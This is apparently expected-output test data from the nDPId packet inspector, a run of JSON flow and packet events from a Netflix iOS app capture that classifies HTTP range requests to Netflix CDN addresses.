+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1236,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1484319056221,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056221,"pkt":"gCqoTGHM5JjWH70UCABFAABAtyBAAEAGnmXAqAEHF\/YLjc+3AFC7qylgAAAAALAC\/\/9syQAAAgQFtAEDAwUBAQgKH2UQiQAAAAAEAgAA"} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1237,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056204,"flow_last_seen":1484319056222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056222,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJpeQLBWjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JfEef80K02ynIjLLoi-HZB1uQ10&random=2473336513","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1238,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056232,"flow_last_seen":1484319056232,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056232,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1238,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1484319056232,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056232,"pkt":"gCqoTGHM5JjWH70UCABFAABA7BpAAEAGaWvAqAEHF\/YLjc+4AFBql8CVAAAAALAC\/\/8mpAAAAgQFtAEDAwUBAQgKH2UQjAAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1239,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056233,"flow_last_seen":1484319056233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056233,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1484319056233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056233,"pkt":"gCqoTGHM5JjWH70UCABFAABALEhAAEAGKT7AqAEHF\/YLjc+5AFBMFfUEAAAAALAC\/\/8QsgAAAgQFtAEDAwUBAQgKH2UQkAAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1240,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056233,"flow_last_seen":1484319056233,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056233,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1484319056233,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056233,"pkt":"gCqoTGHM5JjWH70UCABFAABACXBAAEAGTBbAqAEHF\/YLjc+6AFDVkM0AAAAAALAC\/\/+vNgAAAgQFtAEDAwUBAQgKH2UQkwAAAAAEAgAA"} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1241,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1484319056234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056234,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWnIX9guFwKgBBwBQz7VYH\/mqo2YY4KAS\/\/\/lFwAAAgQFtAEDAwkEAggKL5BAHx9lEIE="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1242,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1484319056234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056234,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7YrOmTYQ6xk+6AS\/\/\/4+gAAAgQFtAEDAwkEAggKJ9gJPh9lEIU="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1243,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056234,"flow_last_seen":1484319056234,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056234,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1484319056234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056234,"pkt":"gCqoTGHM5JjWH70UCABFAABATZFAAEAGB\/XAqAEHF\/YLjc+7AFDfu3VVAAAAALAC\/\/\/8sgAAAgQFtAEDAwUBAQgKH2UQlgAAAAAEAgAA"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1244,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1484319056235,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056235,"pkt":"gCqoTGHM5JjWH70UCABFAAA09NVAAEAGYMTAqAEHF\/YLhc+1AFCjZhjgWB\/5q4AQEBUDvAAAAQEICh9lEJYvkEAf"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1245,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1484319056236,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056236,"pkt":"gCqoTGHM5JjWH70UCABFAAA0j6xAAEAGxeXAqAEHF\/YLjc+2AFBDrGT7Kzpk2YAQEBUXoQAAAQEICh9lEJgn2Ak+"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1246,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1484319056237,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056237,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7dWBL6lu6spYaAS\/\/\/t4QAAAgQFtAEDAwkEAggKuIfCpR9lEIk="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1247,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1484319056241,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056241,"pkt":"gCqoTGHM5JjWH70UCABFAAA0Xt9AAEAG9rLAqAEHF\/YLjc+3AFC7qylhVgS+poAQEBUMigAAAQEICh9lEJq4h8Kl"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1248,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056241,"flow_last_seen":1484319056241,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056241,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1248,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1484319056241,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056241,"pkt":"gCqoTGHM5JjWH70UCABFAABAWzRAAEAG+lHAqAEHF\/YLjc+8AFAt4\/K3AAAAALAC\/\/8xJAAAAgQFtAEDAwUBAQgKH2UQmgAAAAAEAgAA"} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1249,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056214,"flow_last_seen":1484319056241,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056241,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJpmQIRekGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThrvnlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=mQfOf90-RY2Gd2ii20KJpCcYQVk&random=1345646229","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1250,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056210,"flow_last_seen":1484319056253,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056253,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.133","url":"23.246.11.133\/range\/0-65535?o=AQEfKq2oMrLRiWL1ouVaJZ2bLBChGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_ngHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=SixKQmLLJNvShj-pfML-2h4QaqQ&random=727666104","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1251,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056264,"flow_last_seen":1484319056264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53181,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1251,"source":"netflix.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1484319056264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056264,"pkt":"gCqoTGHM5JjWH70UCABFAABAgCRAAEAG1WHAqAEHF\/YLjc+9AFCAerrsAAAAALAC\/\/8WUwAAAgQFtAEDAwUBAQgKH2UQngAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1252,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319056264,"flow_last_seen":1484319056264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1252,"source":"netflix.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1484319056264,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319056264,"pkt":"gCqoTGHM5JjWH70UCABFAABA6tRAAEAGarHAqAEHF\/YLjc++AFBtOQm6AAAAALAC\/\/\/axQAAAgQFtAEDAwUBAQgKH2UQngAAAAAEAgAA"} +01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1253,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056221,"flow_last_seen":1484319056264,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056264,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8&random=323765950","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1255,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7vga1YT37t1VqAS\/\/\/ATQAAAgQFtAEDAwkEAggKs1tjeh9lEJY="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1256,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7h\/u26MapfAlqAS\/\/8KPAAAAgQFtAEDAwkEAggKFFAqwB9lEIw="} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1257,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7qJ1p961ZDNAaAS\/\/87aAAAAgQFtAEDAwkEAggKTYEN7B9lEJM="} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1258,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1484319056276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056276,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7nPaH08TBX1BaAS\/\/\/55gAAAgQFtAEDAwkEAggKNK+mZh9lEJA="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0QtJAAEAGEsDAqAEHF\/YLjc+7AFDfu3VW4GtWFIAQEBXe3gAAAQEICh9lEL6zW2N6"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1262,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0gLJAAEAG1N\/AqAEHF\/YLjc+4AFBql8CWf7tujYAQEBUowwAAAQEICh9lEL4UUCrA"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1263,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1484319056278,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056278,"pkt":"gCqoTGHM5JjWH70UCABFAAA0s8BAAEAGodHAqAEHF\/YLjc+6AFDVkM0Bidafe4AQEBVZ9gAAAQEICh9lEL5NgQ3s"} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1264,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1484319056279,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319056279,"pkt":"gCqoTGHM5JjWH70UCABFAAA0AZpAAEAGU\/jAqAEHF\/YLjc+5AFBMFfUFz2h9PYAQEBUYcgAAAQEICh9lEL40r6Zm"} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1266,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056234,"flow_last_seen":1484319056281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056281,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJiXLBugGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpPflHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=JqTg0NiANIn4-aRwn3uKtWdoQ7M&random=1148970115","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1267,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJmULRajGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpfblHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=zezrDJDQvgO2TiYC1dT3imH4QC8&random=169467304","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01131{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1268,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056232,"flow_last_seen":1484319056292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1484319056292,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQJJqTIRqhGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_vlHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=TnP59JB1wb5UTOCr0m-KQU2kGPo&random=4134731400","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +01133{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1269,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319056233,"flow_last_seen":1484319056302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1484319056302,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"23.246.11.141","url":"23.246.11.141\/range\/0-65535?o=AQEfKq2oMrLRiWL2puNQIpyTIBGjGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThp_biCFrUjHWqh5ipQCtzf4OVWQ&v=3&e=1484347850&t=8Z78vL2i9OzihCA3M1LinMYcMY4&random=2386475836","code":0,"content_type":"","user_agent":"netflix-ios-app"}} +00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"netflix.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1484319056303,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319056303,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADsGWmoX9guNwKgBBwBQz7wVYmHmLePyuKAS\/\/9RBgAAAgQFtAEDAwkEAggKED1piB9lEJo="} 